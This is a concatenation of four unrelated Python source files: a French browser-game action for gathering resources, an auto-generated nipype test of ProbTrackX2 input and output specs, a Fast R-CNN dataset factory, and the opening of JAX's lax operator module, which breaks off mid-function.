action_type=ActionType.SEARCH_MATERIAL,
action_description_id=self._description.id,
query_params={},
),
cost=self.get_cost(character),
group_name="Chercher du matériel",
)
]
def perform(self, character: "CharacterModel", input_: SearchMaterialModel) -> Description:
if not input_.ap:
return Description(
title=self._description.name,
items=[
Part(
is_form=True,
form_values_in_query=True,
form_action=get_character_action_url(
character_id=character.id,
action_type=ActionType.SEARCH_MATERIAL,
query_params=self.input_model_serializer.dump(input_),
action_description_id=self._description.id,
),
items=[
Part(
label=f"Y passer combien de temps (PA) ?",
type_=Type.NUMBER,
name="ap",
)
],
)
],
)
ap_spent = input_.ap
zone_state = self._kernel.game.world_manager.get_zone_state(
world_row_i=character.world_row_i, world_col_i=character.world_col_i
)
found: typing.List[typing.Tuple[str, float]] = []
for produce in self._description.properties["produce"]:
resource_id = produce["resource"]
quantity_per_hour = produce["quantity_per_hour"]
random_loss = produce["random_loss"]
quantity_found = ap_spent * quantity_per_hour
# FIXME BS NOW: bonus with action config skill ?
quantity_found = quantity_found - (
quantity_found * random.randint(0, random_loss) / 100
)
# Test if zone contain absolute resource
if zone_state.is_there_resource(
resource_id, check_from_absolute=True, check_from_tiles=False
):
zone_state.reduce_resource(resource_id, quantity_found, commit=False)
# Test if zone contain resource in some tile
elif zone_state.is_there_resource(
resource_id, check_from_absolute=False, check_from_tiles=True
):
zone_geography = zone_state.zone_map.source.geography
extract_from_row_i, extract_from_col_i = zone_geography.get_random_tile_position_containing_resource(
resource_id, self._kernel
)
zone_state.reduce_resource_from_tile(
resource_id,
quantity_found,
tile_row_i=extract_from_row_i,
tile_col_i=extract_from_col_i,
commit=False,
)
else:
continue
found.append((resource_id, quantity_found))
self._kernel.resource_lib.add_resource_to(
character_id=character.id,
resource_id=resource_id,
quantity=quantity_found,
commit=False,
)
parts: typing.List[Part] = []
self._kernel.character_lib.reduce_action_points(
character_id=character.id, cost=input_.ap, commit=False
)
self._kernel.server_db_session.commit()
for resource_id, quantity in found:
resource_description = self._kernel.game.config.resources[resource_id]
quantity_str = quantity_to_str(quantity, resource_description.unit, self._kernel)
parts.append(Part(text=f"{quantity_str} de {resource_description.name}"))
return Description(
title="Vous avez récupéré",
items=parts,
footer_links=[
Part(is_link=True, go_back_zone=True, label="Retourner à l'écran de déplacements")
],
)
|
py | b415ca8353d378ecdedfdf142d112e73b4d9fc38 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.fsl.dti import ProbTrackX2
def test_ProbTrackX2_inputs():
input_map = dict(args=dict(argstr='%s',
),
avoid_mp=dict(argstr='--avoid=%s',
),
c_thresh=dict(argstr='--cthr=%.3f',
),
colmask4=dict(argstr='--colmask4=%s',
),
correct_path_distribution=dict(argstr='--pd',
),
dist_thresh=dict(argstr='--distthresh=%.3f',
),
distthresh1=dict(argstr='--distthresh1=%.3f',
),
distthresh3=dict(argstr='--distthresh3=%.3f',
),
environ=dict(nohash=True,
usedefault=True,
),
fibst=dict(argstr='--fibst=%d',
),
fopd=dict(argstr='--fopd=%s',
),
force_dir=dict(argstr='--forcedir',
usedefault=True,
),
fsamples=dict(mandatory=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inv_xfm=dict(argstr='--invxfm=%s',
),
loop_check=dict(argstr='--loopcheck',
),
lrtarget3=dict(argstr='--lrtarget3=%s',
),
mask=dict(argstr='-m %s',
mandatory=True,
),
meshspace=dict(argstr='--meshspace=%s',
),
mod_euler=dict(argstr='--modeuler',
),
n_samples=dict(argstr='--nsamples=%d',
usedefault=True,
),
n_steps=dict(argstr='--nsteps=%d',
),
network=dict(argstr='--network',
),
omatrix1=dict(argstr='--omatrix1',
),
omatrix2=dict(argstr='--omatrix2',
requires=['target2'],
),
omatrix3=dict(argstr='--omatrix3',
requires=['target3', 'lrtarget3'],
),
omatrix4=dict(argstr='--omatrix4',
),
onewaycondition=dict(argstr='--onewaycondition',
),
opd=dict(argstr='--opd',
usedefault=True,
),
os2t=dict(argstr='--os2t',
),
out_dir=dict(argstr='--dir=%s',
genfile=True,
),
output_type=dict(),
phsamples=dict(mandatory=True,
),
rand_fib=dict(argstr='--randfib=%d',
),
random_seed=dict(argstr='--rseed',
),
s2tastext=dict(argstr='--s2tastext',
),
sample_random_points=dict(argstr='--sampvox',
),
samples_base_name=dict(argstr='--samples=%s',
usedefault=True,
),
seed=dict(argstr='--seed=%s',
mandatory=True,
),
seed_ref=dict(argstr='--seedref=%s',
),
simple=dict(argstr='--simple',
usedefault=False,
),
step_length=dict(argstr='--steplength=%.3f',
),
stop_mask=dict(argstr='--stop=%s',
),
target2=dict(argstr='--target2=%s',
),
target3=dict(argstr='--target3=%s',
),
target4=dict(argstr='--target4=%s',
),
target_masks=dict(argstr='--targetmasks=%s',
),
terminal_output=dict(mandatory=True,
nohash=True,
),
thsamples=dict(mandatory=True,
),
use_anisotropy=dict(argstr='--usef',
),
verbose=dict(argstr='--verbose=%d',
),
waycond=dict(argstr='--waycond=%s',
),
wayorder=dict(argstr='--wayorder',
),
waypoints=dict(argstr='--waypoints=%s',
),
xfm=dict(argstr='--xfm=%s',
),
)
inputs = ProbTrackX2.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_ProbTrackX2_outputs():
output_map = dict(fdt_paths=dict(),
log=dict(),
lookup_tractspace=dict(),
matrix1_dot=dict(),
matrix2_dot=dict(),
matrix3_dot=dict(),
network_matrix=dict(),
particle_files=dict(),
targets=dict(),
way_total=dict(),
)
outputs = ProbTrackX2.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
py | b415cc50743bbc135a4f41d77b63a2768a7ff897 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Factory method for easily getting imdbs by name."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# print('1\n')
__sets = {}
from .pascal_voc import pascal_voc
# from lib.datasets.coco import coco
#from lib.datasets.DIY_pascal_voc import DIY_pascal_voc
import numpy as np
# Set up voc_<year>_<split>
for year in ['2007', '2012']:
for split in ['train', 'val', 'trainval', 'test']:
name = 'voc_{}_{}'.format(year, split)
__sets[name] = (lambda split=split, year=year: pascal_voc(split, year))
# print('2')
# # Set up coco_2014_<split>
# for year in ['2014']:
# for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:
# name = 'coco_{}_{}'.format(year, split)
# __sets[name] = (lambda split=split, year=year: coco(split, year))
#
# # Set up coco_2015_<split>
# for year in ['2015']:
# for split in ['test', 'test-dev']:
# name = 'coco_{}_{}'.format(year, split)
# __sets[name] = (lambda split=split, year=year: coco(split, year))
for year in ['2018']:
for split in ['trainval']:
name = 'DIY_dataset'
__sets[name] = (lambda split=split, year=year: DIY_pascal_voc(split, year))
# print('3\n')
def get_imdb(name):
"""Get an imdb (image database) by name."""
print('sets', __sets)
if name not in __sets:
raise KeyError('Unknown dataset: {}'.format(name))
return __sets[name]()
def list_imdbs():
"""List all registered imdbs."""
return list(__sets.keys()) |
py | b415cd4fb7a3ec0185680c3390be83a65b1c9697 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Pytype is too slow to check this file.
# pytype: skip-file
import builtins
from enum import IntEnum
import functools
import itertools
import operator
from typing import (Any, Callable, List, NamedTuple, Optional, Sequence,\
Union, Tuple)
import warnings
import numpy as np
import jax
from jax import core
from jax import ad_util
from jax import api
from jax import api_util
from jax import linear_util as lu
from jax import dtypes
from jax import lazy
from jax import tree_util
from jax.config import flags, config
from jax.core import (Primitive, _canonicalize_dimension, UnshapedArray,
ShapedArray, ConcreteArray, raise_to_shaped,
abstract_token, canonicalize_shape)
from jax.abstract_arrays import array_types
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla
from jax.interpreters import pxla
from jax.interpreters import ad
from jax.interpreters import invertible_ad as iad
from jax.interpreters import batching
from jax.interpreters import masking
from jax._src.util import (cache, safe_zip, partial, prod, safe_map,
canonicalize_axis, split_list)
from jax.tree_util import tree_map
from jax.lib import pytree
from jax.lib import xla_bridge
from jax.lib import xla_client
xb = xla_bridge
xc = xla_client
xops = xla_client.ops
FLAGS = flags.FLAGS
_max = builtins.max
_min = builtins.min
_reduce = functools.reduce
Array = Any
DType = Any
Shape = Sequence[int]
def _try_broadcast_shapes(shapes):
assert shapes
if len(shapes) == 1: return shapes[0]
rank, *others = {len(shape) for shape in shapes}
if others: return None # must have consistent rank
if not rank: return () # scalar case
result_shape = [None] * rank
for i, sizes in enumerate(zip(*shapes)):
if sizes[:-1] == sizes[1:]:
result_shape[i] = sizes[0] # all equal sizes for this dimension
else:
sizes = [d for d in sizes if d != 1]
if sizes[:-1] != sizes[1:]:
return None # must have equal sizes other than 1-sized axes
result_shape[i] = sizes[0] if sizes else 1
return tuple(result_shape)
@cache()
def broadcast_shapes(*shapes):
"""Returns the shape that results from NumPy broadcasting of `shapes`."""
if len(shapes) == 1:
return shapes[0]
ndim = _max(len(shape) for shape in shapes)
shapes = [(1,) * (ndim - len(shape)) + shape for shape in shapes]
result_shape = _try_broadcast_shapes(shapes)
if result_shape is None:
raise ValueError("Incompatible shapes for broadcasting: {}"
.format(tuple(map(tuple, shapes))))
return result_shape
def _identity(x): return x
### traceables
def neg(x: Array) -> Array:
r"""Elementwise negation: :math:`-x`."""
return neg_p.bind(x)
def sign(x: Array) -> Array:
r"""Elementwise sign.
For floating-point inputs, returns
:math:`\mathrm{sign}(x) = \begin{cases}
-1 & x < 0\\
-0 & x = -0\\
\mathit{NaN} & x = \mathit{NaN}\\
+0 & x = +0\\
1 & x > 0
\end{cases}`
For signed integer inputs, returns
:math:`\mathrm{sign}(x) = \begin{cases}
-1 & x < 0\\
0 & x = 0\\
1 & x > 0
\end{cases}`
For complex inputs, returns the complex phase, i.e.
:math:`\mathrm{sign}(x) = \frac{x}{|x|}`.
"""
return sign_p.bind(x)
def nextafter(x1: Array, x2: Array) -> Array:
r"""Returns the next representable value after `x1` in the direction of `x2`.
Note that in some environments flush-denormal-to-zero semantics is used.
This means that, around zero, this function returns strictly non-zero
values which appear as zero in any operations. Consider this example::
>>> jnp.nextafter(0, 1) # denormal numbers are representable
DeviceArray(1.e-45, dtype=float32)
>>> jnp.nextafter(0, 1) * 1 # but are flushed to zero
DeviceArray(0., dtype=float32)
For the smallest usable (i.e. normal) float, use ``tiny`` of ``jnp.finfo``.
"""
return nextafter_p.bind(_brcast(x1, x2), _brcast(x2, x1))
def floor(x: Array) -> Array:
r"""Elementwise floor: :math:`\left\lfloor x \right\rfloor`."""
return floor_p.bind(x)
def ceil(x: Array) -> Array:
r"""Elementwise ceiling: :math:`\left\lceil x \right\rceil`."""
return ceil_p.bind(x)
class RoundingMethod(IntEnum):
AWAY_FROM_ZERO = 0
TO_NEAREST_EVEN = 1
def round(x: Array,
rounding_method: RoundingMethod = RoundingMethod.AWAY_FROM_ZERO
) -> Array:
r"""Elementwise round.
Rounds values to the nearest integer.
Args:
x: an array or scalar value to round.
rounding_method: the method to use when rounding halfway values
(e.g., `0.5`). See ``lax.RoundingMethod`` for the list of possible
values.
Returns:
An array containing the elementwise rounding of x.
"""
rounding_method = RoundingMethod(rounding_method)
return round_p.bind(x, rounding_method=rounding_method)
def is_finite(x: Array) -> Array:
r"""Elementwise :math:`\mathrm{isfinite}`.
For each element x returns `True` if and only if x is not :math:`\pm\infty` or
:math:`\mathit{NaN}`.
"""
return is_finite_p.bind(x)
def exp(x: Array) -> Array:
r"""Elementwise exponential: :math:`e^x`."""
return exp_p.bind(x)
def expm1(x: Array) -> Array:
r"""Elementwise :math:`e^{x} - 1`."""
return expm1_p.bind(x)
def log(x: Array) -> Array:
r"""Elementwise natural logarithm: :math:`\mathrm{log}(x)`."""
return log_p.bind(x)
def log1p(x: Array) -> Array:
r"""Elementwise :math:`\mathrm{log}(1 + x)`."""
return log1p_p.bind(x)
def tanh(x: Array) -> Array:
r"""Elementwise hyperbolic tangent: :math:`\mathrm{tanh}(x)`."""
return tanh_p.bind(x)
def sin(x: Array) -> Array:
r"""Elementwise sine: :math:`\mathrm{sin}(x)`."""
return sin_p.bind(x)
def cos(x: Array) -> Array:
r"""Elementwise cosine: :math:`\mathrm{cos}(x)`."""
return cos_p.bind(x)
def atan2(x: Array, y: Array) -> Array:
r"""Elementwise arc tangent of two variables:
:math:`\mathrm{atan}({x \over y})`."""
return atan2_p.bind(x, y)
def betainc(a: Array, b: Array, x: Array) -> Array:
r"""Elementwise regularized incomplete beta integral."""
return regularized_incomplete_beta_p.bind(a, b, x)
def lgamma(x: Array) -> Array:
r"""Elementwise log gamma: :math:`\mathrm{log}(\Gamma(x))`."""
return lgamma_p.bind(x)
def digamma(x: Array) -> Array:
r"""Elementwise digamma: :math:`\psi(x)`."""
return digamma_p.bind(x)
def igamma(a: Array, x: Array) -> Array:
r"""Elementwise regularized incomplete gamma function."""
return igamma_p.bind(a, x)
def igammac(a: Array, x: Array) -> Array:
r"""Elementwise complementary regularized incomplete gamma function."""
return igammac_p.bind(a, x)
def igamma_grad_a(a: Array, x: Array) -> Array:
r"""Elementwise derivative of the regularized incomplete gamma function."""
return igamma_grad_a_p.bind(a, x)
def random_gamma_grad(a: Array, x: Array) -> Array:
r"""Elementwise derivative of samples from `Gamma(a, 1)`."""
return random_gamma_grad_p.bind(a, x)
def bessel_i0e(x: Array) -> Array:
r"""Exponentially scaled modified Bessel function of order 0:
:math:`\mathrm{i0e}(x) = e^{-|x|} \mathrm{i0}(x)`
"""
return bessel_i0e_p.bind(x)
def bessel_i1e(x: Array) -> Array:
r"""Exponentially scaled modified Bessel function of order 1:
:math:`\mathrm{i1e}(x) = e^{-|x|} \mathrm{i1}(x)`
"""
return bessel_i1e_p.bind(x)
def erf(x: Array) -> Array:
r"""Elementwise error function: :math:`\mathrm{erf}(x)`."""
return erf_p.bind(x)
def erfc(x: Array) -> Array:
r"""Elementwise complementary error function:
:math:`\mathrm{erfc}(x) = 1 - \mathrm{erf}(x)`."""
return erfc_p.bind(x)
def erf_inv(x: Array) -> Array:
r"""Elementwise inverse error function: :math:`\mathrm{erf}^{-1}(x)`."""
return erf_inv_p.bind(x)
def real(x: Array) -> Array:
r"""Elementwise extract real part: :math:`\mathrm{Re}(x)`.
Returns the real part of a complex number.
"""
return real_p.bind(x)
def imag(x: Array) -> Array:
r"""Elementwise extract imaginary part: :math:`\mathrm{Im}(x)`.
Returns the imaginary part of a complex number.
"""
return imag_p.bind(x)
def complex(x: Array, y: Array) -> Array:
r"""Elementwise make complex number: :math:`x + jy`.
Builds a complex number from real and imaginary parts.
"""
return complex_p.bind(_brcast(x, y), _brcast(y, x))
def conj(x: Array) -> Array:
r"""Elementwise complex conjugate function: :math:`\overline{x}`."""
return conj_p.bind(x, input_dtype=_dtype(x))
def abs(x: Array) -> Array:
r"""Elementwise absolute value: :math:`|x|`."""
return abs_p.bind(x)
def pow(x: Array, y: Array) -> Array:
r"""Elementwise power: :math:`x^y`."""
return pow_p.bind(x, y)
def integer_pow(x: Array, y: int) -> Array:
r"""Elementwise power: :math:`x^y`, where :math:`y` is a fixed integer."""
return integer_pow_p.bind(x, y=y)
def sqrt(x: Array) -> Array:
r"""Elementwise square root: :math:`\sqrt{x}`."""
return sqrt_p.bind(x)
def rsqrt(x: Array) -> Array:
r"""Elementwise reciprocal square root: :math:`1 \over \sqrt{x}`."""
return rsqrt_p.bind(x)
def bitwise_not(x: Array) -> Array:
r"""Elementwise NOT: :math:`\neg x`."""
return not_p.bind(x)
def bitwise_and(x: Array, y: Array) -> Array:
r"""Elementwise AND: :math:`x \wedge y`."""
return and_p.bind(x, y)
def bitwise_or(x: Array, y: Array) -> Array:
r"""Elementwise OR: :math:`x \vee y`."""
return or_p.bind(x, y)
def bitwise_xor(x: Array, y: Array) -> Array:
r"""Elementwise exclusive OR: :math:`x \oplus y`."""
return xor_p.bind(x, y)
def population_count(x: Array) -> Array:
r"""Elementwise popcount, count the number of set bits in each element."""
return population_count_p.bind(x)
def add(x: Array, y: Array) -> Array:
r"""Elementwise addition: :math:`x + y`."""
return add_p.bind(x, y)
def sub(x: Array, y: Array) -> Array:
r"""Elementwise subtraction: :math:`x - y`."""
return sub_p.bind(x, y)
def mul(x: Array, y: Array) -> Array:
r"""Elementwise multiplication: :math:`x \times y`."""
return mul_p.bind(x, y)
def div(x: Array, y: Array) -> Array:
r"""Elementwise division: :math:`x \over y`."""
return div_p.bind(x, y)
def rem(x: Array, y: Array) -> Array:
r"""Elementwise remainder: :math:`x \bmod y`."""
return rem_p.bind(x, y)
def max(x: Array, y: Array) -> Array:
r"""Elementwise maximum: :math:`\mathrm{max}(x, y)`
For complex numbers, uses a lexicographic comparison on the
`(real, imaginary)` pairs."""
return max_p.bind(x, y)
def min(x: Array, y: Array) -> Array:
r"""Elementwise minimum: :math:`\mathrm{min}(x, y)`
For complex numbers, uses a lexicographic comparison on the
`(real, imaginary)` pairs."""
return min_p.bind(x, y)
def shift_left(x: Array, y: Array) -> Array:
r"""Elementwise left shift: :math:`x \ll y`."""
return shift_left_p.bind(x, y)
def shift_right_arithmetic(x: Array, y: Array) -> Array:
r"""Elementwise arithmetic right shift: :math:`x \gg y`."""
return shift_right_arithmetic_p.bind(x, y)
def shift_right_logical(x: Array, y: Array) -> Array:
r"""Elementwise logical right shift: :math:`x \gg y`."""
return shift_right_logical_p.bind(x, y)
def eq(x: Array, y: Array) -> Array:
r"""Elementwise equals: :math:`x = y`."""
return eq_p.bind(x, y)
def ne(x: Array, y: Array) -> Array:
r"""Elementwise not-equals: :math:`x \neq y`."""
return ne_p.bind(x, y)
def ge(x: Array, y: Array) -> Array:
r"""Elementwise greater-than-or-equals: :math:`x \geq y`."""
return ge_p.bind(x, y)
def gt(x: Array, y: Array) -> Array:
r"""Elementwise greater-than: :math:`x > y`."""
return gt_p.bind(x, y)
def le(x: Array, y: Array) -> Array:
r"""Elementwise less-than-or-equals: :math:`x \leq y`."""
return le_p.bind(x, y)
def lt(x: Array, y: Array) -> Array:
r"""Elementwise less-than: :math:`x < y`."""
return lt_p.bind(x, y)
def convert_element_type(operand: Array, new_dtype: DType = None,
weak_type: bool = False) -> Array:
"""Elementwise cast.
Wraps XLA's `ConvertElementType
<https://www.tensorflow.org/xla/operation_semantics#convertelementtype>`_
operator, which performs an elementwise conversion from one type to another.
Similar to a C++ `static_cast`.
Args:
operand: an array or scalar value to be cast
new_dtype: the new type. Should be a NumPy type.
weak_type: whether the new dtype should be weak.
Returns:
An array with the same shape as `operand`, cast elementwise to `new_dtype`.
"""
new_dtype = dtypes.canonicalize_dtype(new_dtype or _dtype(operand))
if hasattr(operand, '__jax_array__'):
operand = operand.__jax_array__()
new_weak_type = bool(weak_type)
old_dtype = dtypes.canonicalize_dtype(_dtype(operand))
old_weak_type = dtypes.is_weakly_typed(operand)
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
msg = "Casting complex values to real discards the imaginary part"
warnings.warn(msg, np.ComplexWarning, stacklevel=2)
if not isinstance(operand, (core.Tracer, xla.DeviceArray)):
return _device_put_raw(np.asarray(operand, dtype=new_dtype),
weak_type=new_weak_type)
elif (old_dtype, old_weak_type) == (new_dtype, new_weak_type):
return operand
else:
return convert_element_type_p.bind(operand, new_dtype=new_dtype,
weak_type=new_weak_type)
def bitcast_convert_type(operand: Array, new_dtype: DType) -> Array:
"""Elementwise bitcast.
Wraps XLA's `BitcastConvertType
<https://www.tensorflow.org/xla/operation_semantics#bitcastconverttype>`_
operator, which performs a bit cast from one type to another. The bitwidth
of the source and destination types must match.
Args:
operand: an array or scalar value to be cast
new_dtype: the new type. Should be a NumPy type.
Returns:
An array with the same shape as `operand`, bitcast elementwise to
`new_dtype`.
"""
new_dtype = dtypes.canonicalize_dtype(new_dtype)
return bitcast_convert_type_p.bind(operand, new_dtype=new_dtype)
def clamp(min: Array, x: Array, max: Array) -> Array:
r"""Elementwise clamp.
Returns :math:`\mathrm{clamp}(x) = \begin{cases}
\mathit{min} & \text{if } x < \mathit{min},\\
\mathit{max} & \text{if } x > \mathit{max},\\
x & \text{otherwise}
\end{cases}`.
"""
return clamp_p.bind(min, x, max)
def concatenate(operands: Sequence[Array], dimension: int) -> Array:
"""Concatenates a sequence of arrays along `dimension`.
Wraps XLA's `Concatenate
<https://www.tensorflow.org/xla/operation_semantics#concatenate>`_
operator.
Args:
operands: a sequence of arrays to concatenate. The arrays must have equal
shapes, except in the `dimension` axis.
dimension: the dimension along which to concatenate the arrays.
Returns:
An array containing the concatenation.
"""
return concatenate_p.bind(*operands, dimension=dimension)
Precision = xla_client.PrecisionConfig.Precision
Precision.__str__ = lambda precision: precision.name
PrecisionType = Any
PrecisionLike = Union[None, PrecisionType, Tuple[PrecisionType, PrecisionType]]
class ConvDimensionNumbers(NamedTuple):
"""Describes batch, spatial, and feature dimensions of a convolution.
Args:
lhs_spec: a tuple of nonnegative integer dimension numbers containing
`(batch dimension, feature dimension, spatial dimensions...)`.
rhs_spec: a tuple of nonnegative integer dimension numbers containing
`(out feature dimension, in feature dimension, spatial dimensions...)`.
out_spec: a tuple of nonnegative integer dimension numbers containing
`(batch dimension, feature dimension, spatial dimensions...)`.
"""
lhs_spec: Sequence[int]
rhs_spec: Sequence[int]
out_spec: Sequence[int]
ConvGeneralDilatedDimensionNumbers = Union[
None, ConvDimensionNumbers, Tuple[str, str, str]]
def conv_general_dilated(
lhs: Array, rhs: Array, window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
lhs_dilation: Optional[Sequence[int]] = None,
rhs_dilation: Optional[Sequence[int]] = None,
dimension_numbers: ConvGeneralDilatedDimensionNumbers = None,
feature_group_count: int = 1, batch_group_count: int = 1,
precision: PrecisionLike = None) -> Array:
"""General n-dimensional convolution operator, with optional dilation.
Wraps XLA's `Conv
<https://www.tensorflow.org/xla/operation_semantics#conv_convolution>`_
operator.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence of
`n` `(low, high)` integer pairs that give the padding to apply before and
after each spatial dimension.
lhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `lhs`. LHS dilation
is also known as transposed convolution.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
dimension_numbers: either `None`, a `ConvDimensionNumbers` object, or
a 3-tuple `(lhs_spec, rhs_spec, out_spec)`, where each element is a string
of length `n+2`.
feature_group_count: integer, default 1. See XLA HLO docs.
batch_group_count: integer, default 1. See XLA HLO docs.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
Returns:
An array containing the convolution result.
In the string case of `dimension_numbers`, each character identifies by
position:
- the batch dimensions in `lhs`, `rhs`, and the output with the character
'N',
- the feature dimensions in `lhs` and the output with the character 'C',
- the input and output feature dimensions in rhs with the characters 'I'
and 'O' respectively, and
- spatial dimension correspondences between lhs, rhs, and the output using
any distinct characters.
For example, to indicate dimension numbers consistent with the `conv` function
with two spatial dimensions, one could use `('NCHW', 'OIHW', 'NCHW')`. As
another example, to indicate dimension numbers consistent with the TensorFlow
Conv2D operation, one could use `('NHWC', 'HWIO', 'NHWC')`. When using the
latter form of convolution dimension specification, window strides are
associated with spatial dimension character labels according to the order in
which the labels appear in the `rhs_spec` string, so that `window_strides[0]`
is matched with the dimension corresponding to the first character
appearing in rhs_spec that is not `'I'` or `'O'`.
If `dimension_numbers` is `None`, the default is `('NCHW', 'OIHW', 'NCHW')`
(for a 2D convolution).
"""
dnums = conv_dimension_numbers(lhs.shape, rhs.shape, dimension_numbers)
if lhs_dilation is None:
lhs_dilation = (1,) * (lhs.ndim - 2)
elif isinstance(padding, str) and not len(lhs_dilation) == lhs_dilation.count(1):
raise ValueError(
"String padding is not implemented for transposed convolution "
"using this op. Please either exactly specify the required padding or "
"use conv_transpose.")
if rhs_dilation is None:
rhs_dilation = (1,) * (rhs.ndim - 2)
if isinstance(padding, str):
lhs_perm, rhs_perm, _ = dnums
rhs_shape = np.take(rhs.shape, rhs_perm)[2:] # type: ignore[index]
effective_rhs_shape = [(k-1) * r + 1 for k, r in zip(rhs_shape, rhs_dilation)]
padding = padtype_to_pads(
np.take(lhs.shape, lhs_perm)[2:], effective_rhs_shape, # type: ignore[index]
window_strides, padding)
return conv_general_dilated_p.bind(
lhs, rhs, window_strides=tuple(window_strides), padding=tuple(padding),
lhs_dilation=tuple(lhs_dilation), rhs_dilation=tuple(rhs_dilation),
dimension_numbers=dnums,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
lhs_shape=lhs.shape, rhs_shape=rhs.shape,
precision=_canonicalize_precision(precision))
def dot(lhs: Array, rhs: Array, precision: PrecisionLike = None,
preferred_element_type: Optional[DType] = None) -> Array:
"""Vector/vector, matrix/vector, and matrix/matrix multiplication.
Wraps XLA's `Dot
<https://www.tensorflow.org/xla/operation_semantics#dot>`_
operator.
For more general contraction, see the `dot_general` operator.
Args:
lhs: an array of rank 1 or 2.
rhs: an array of rank 1 or 2.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
preferred_element_type: Optional. Either ``None``, which means the default
accumulation type for the input types, or a datatype, indicating to
accumulate results to and return a result with that datatype.
Returns:
An array containing the product.
"""
if 1 <= lhs.ndim <= 2 and 1 <= rhs.ndim <= 2 and lhs.shape[-1] == rhs.shape[0]:
return dot_general(lhs, rhs, (((lhs.ndim - 1,), (0,)), ((), ())),
precision=precision, preferred_element_type=preferred_element_type)
else:
raise TypeError("Incompatible shapes for dot: got {} and {}.".format(
lhs.shape, rhs.shape))
DotDimensionNumbers = Tuple[Tuple[Sequence[int], Sequence[int]],
Tuple[Sequence[int], Sequence[int]]]
def dot_general(lhs: Array, rhs: Array, dimension_numbers: DotDimensionNumbers,
precision: PrecisionLike = None,
preferred_element_type: Optional[DType] = None) -> Array:
"""More general contraction operator.
Wraps XLA's `DotGeneral
<https://www.tensorflow.org/xla/operation_semantics#dotgeneral>`_
operator.
Args:
lhs: an array
rhs: an array
dimension_numbers: a tuple of tuples of the form
`((lhs_contracting_dims, rhs_contracting_dims),
(lhs_batch_dims, rhs_batch_dims))`
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
preferred_element_type: Optional. Either ``None``, which means the default
accumulation type for the input types, or a datatype, indicating to
accumulate results to and return a result with that datatype.
Returns:
An array containing the result.
"""
contract_dims_seq, batch_dims_seq = dimension_numbers
contract_dims = tuple(map(lambda x: tuple(x), contract_dims_seq))
batch_dims = tuple(map(lambda x: tuple(x), batch_dims_seq))
return dot_general_p.bind(lhs, rhs,
dimension_numbers=(contract_dims, batch_dims),
precision=_canonicalize_precision(precision),
preferred_element_type=preferred_element_type)
def broadcast(operand: Array, sizes: Sequence[int]) -> Array:
"""Broadcasts an array, adding new major dimensions.
Wraps XLA's `Broadcast
<https://www.tensorflow.org/xla/operation_semantics#broadcast>`_
operator.
Args:
operand: an array
sizes: a sequence of integers, giving the sizes of new major dimensions
to add.
Returns:
An array containing the result.
"""
dims = tuple(range(len(sizes), len(sizes) + np.ndim(operand)))
return broadcast_in_dim(operand, tuple(sizes) + np.shape(operand), dims)
def broadcast_in_dim(operand: Array, shape: Shape,
broadcast_dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `BroadcastInDim
<https://www.tensorflow.org/xla/operation_semantics#broadcastindim>`_
operator.
"""
shape = _broadcast_in_dim_shape_rule(
operand, shape=shape, broadcast_dimensions=broadcast_dimensions)
if (np.ndim(operand) == len(shape) and not len(broadcast_dimensions)
and isinstance(operand, (xla.DeviceArray, core.Tracer))):
return operand
return broadcast_in_dim_p.bind(
operand, shape=tuple(shape),
broadcast_dimensions=tuple(broadcast_dimensions))
def broadcast_to_rank(x: Array, rank: int) -> Array:
"""Adds leading dimensions of ``1`` to give ``x`` rank ``rank``."""
return broadcast(x, (1,) * (rank - x.ndim))
def reshape(operand: Array, new_sizes: Shape,
dimensions: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `Reshape
<https://www.tensorflow.org/xla/operation_semantics#reshape>`_
operator.
For inserting/removing dimensions of size 1, prefer using ``lax.squeeze`` /
``lax.expand_dims``. These preserve information about axis identity that may
be useful for advanced transformation rules.
"""
new_sizes = canonicalize_shape(new_sizes) # TODO
new_sizes = tuple(new_sizes)
same_shape = np.shape(operand) == new_sizes
same_dims = dimensions is None or tuple(dimensions) == tuple(range(np.ndim(operand)))
if np.shape(operand) and same_shape and same_dims:
return operand
else:
